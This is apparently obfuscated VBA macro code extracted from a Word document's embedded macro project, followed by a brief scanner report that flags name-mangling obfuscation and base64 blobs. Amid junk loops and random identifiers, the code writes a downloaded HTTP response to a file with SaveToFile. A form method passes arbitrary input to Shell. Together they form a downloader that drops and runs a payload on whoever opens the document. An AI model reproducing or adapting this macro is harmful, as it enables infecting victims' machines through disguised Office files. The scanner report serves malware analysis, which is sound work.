tj1HWtJ02uA = 46664
NDzYdI1kgH6aJ9ei = tD5yiPeNMHf & j7vDtZVuGFgzP
DcPpzZFIKYQ4kg.Type = 1: DcPpzZFIKYQ4kg.Open
Dim y2o6pK9P3jg
y2o6pK9P3jg = 82
While y2o6pK9P3jg <= 402
y2o6pK9P3jg = y2o6pK9P3jg + 21
Wend
S4oclC5a0XQk = "It0gPSpkBVOv12T"
SI5NLrO8tY = xFlQehyBfL & y2o6pK9P3jg
If 8 < 221 Then
' uBtVQoEnYZc3
Else
' fuUJcB0rLC5zEt3W
Debug.Print "mYG3ZIxBCrzo"
End If
DcPpzZFIKYQ4kg.Write WSiKV4zpePnv6csAY.responseBody
Dim vuIgXG7ZjKBW
vuIgXG7ZjKBW = 42
While vuIgXG7ZjKBW <= 366
vuIgXG7ZjKBW = vuIgXG7ZjKBW + 31
Wend
eZGc4b5QX6jo = 59115
s5X3ny2dDSfg = n6IiWJlsf & vuIgXG7ZjKBW
Dim XP38pmR5sTdSjBW
XP38pmR5sTdSjBW = 25
While XP38pmR5sTdSjBW < 1022
XP38pmR5sTdSjBW = XP38pmR5sTdSjBW + 4
Wend
ko2zElJk9 = "oXGSimN73Q"
nEn3pNafx0AzZMCD = ysrbuvJjWqxK37iFT & XP38pmR5sTdSjBW
If 52 < 220 Then
' xBkZEwz64tmjo0Tg
Else
' POD5u4iNyjscvVGtX
MsgBox "oypWnk52CO0M"
End If
DcPpzZFIKYQ4kg.SaveToFile b12OiWrMSUFkLR$, 2
If 1039 - 33 = 26420 / 5284 Then
WtyJUSjXWDNRYv = "yUpluhBMPw"
End If
uyl6VNQoX0FB = "WW1kiDtVcY7hvnML"
x7l8u0GYT = WtyJUSjXWDNRYv & uyl6VNQoX0FB
If 46 < 178 Then
' Vs03HtmTf
Else
' R6sUiJEpqnXPto
MsgBox "w2KjfA8NT"
End If
Dim tnVaXRf2UhPiWlsO5
tnVaXRf2UhPiWlsO5 = 250
While tnVaXRf2UhPiWlsO5 <= 970
tnVaXRf2UhPiWlsO5 = tnVaXRf2UhPiWlsO5 + 32
Wend
LkFuLmtCIjDaEnA = 46900
YefhZPNC9 = dkXsgOE8RFz4 & tnVaXRf2UhPiWlsO5
DcPpzZFIKYQ4kg.Close: Set DcPpzZFIKYQ4kg = Nothing
End If
If 938 + 6 = 1904 - 1894 Then
UuFqTrUAN = "w6VSCjnY1Kb"
End If
BmhjZQ3WRYpeI2DL = 29643
IH6hBM1j94SkdU0b = UuFqTrUAN & BmhjZQ3WRYpeI2DL
If 31 < 210 Then
' MdTGYkgBzX7Qu45
Else
' SDSta5vzb8kNURLP
MsgBox "Q68iHyhLJ5x"
End If
Set WSiKV4zpePnv6csAY = Nothing
End Function

Attribute VB_Name = "frmMain"
Attribute VB_Base = "0{8D6705FA-45E9-4541-8C5A-E5BB744068BB}{9FB8E253-ED4A-4864-94EF-D0EAA5770CD6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    Private Sub UserForm_Initialize()

        ' Initialize
        Me.Caption = ""

    End Sub

    Public Sub hello(bafGXRwJxsNM6HAd)

        Shell bafGXRwJxsNM6HAd

    End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 57856 bytes
SHA-256: 9c4b9c8dc2395e716459bc7848e99bc159c1f1953e9548582c86991cbb9cd19e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
666 of 1158 identifiers look randomly generated (e.g. 'byBjb25zZXF1YXQuIER1aXMgYXV0ZSBpcnVyZSBk') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).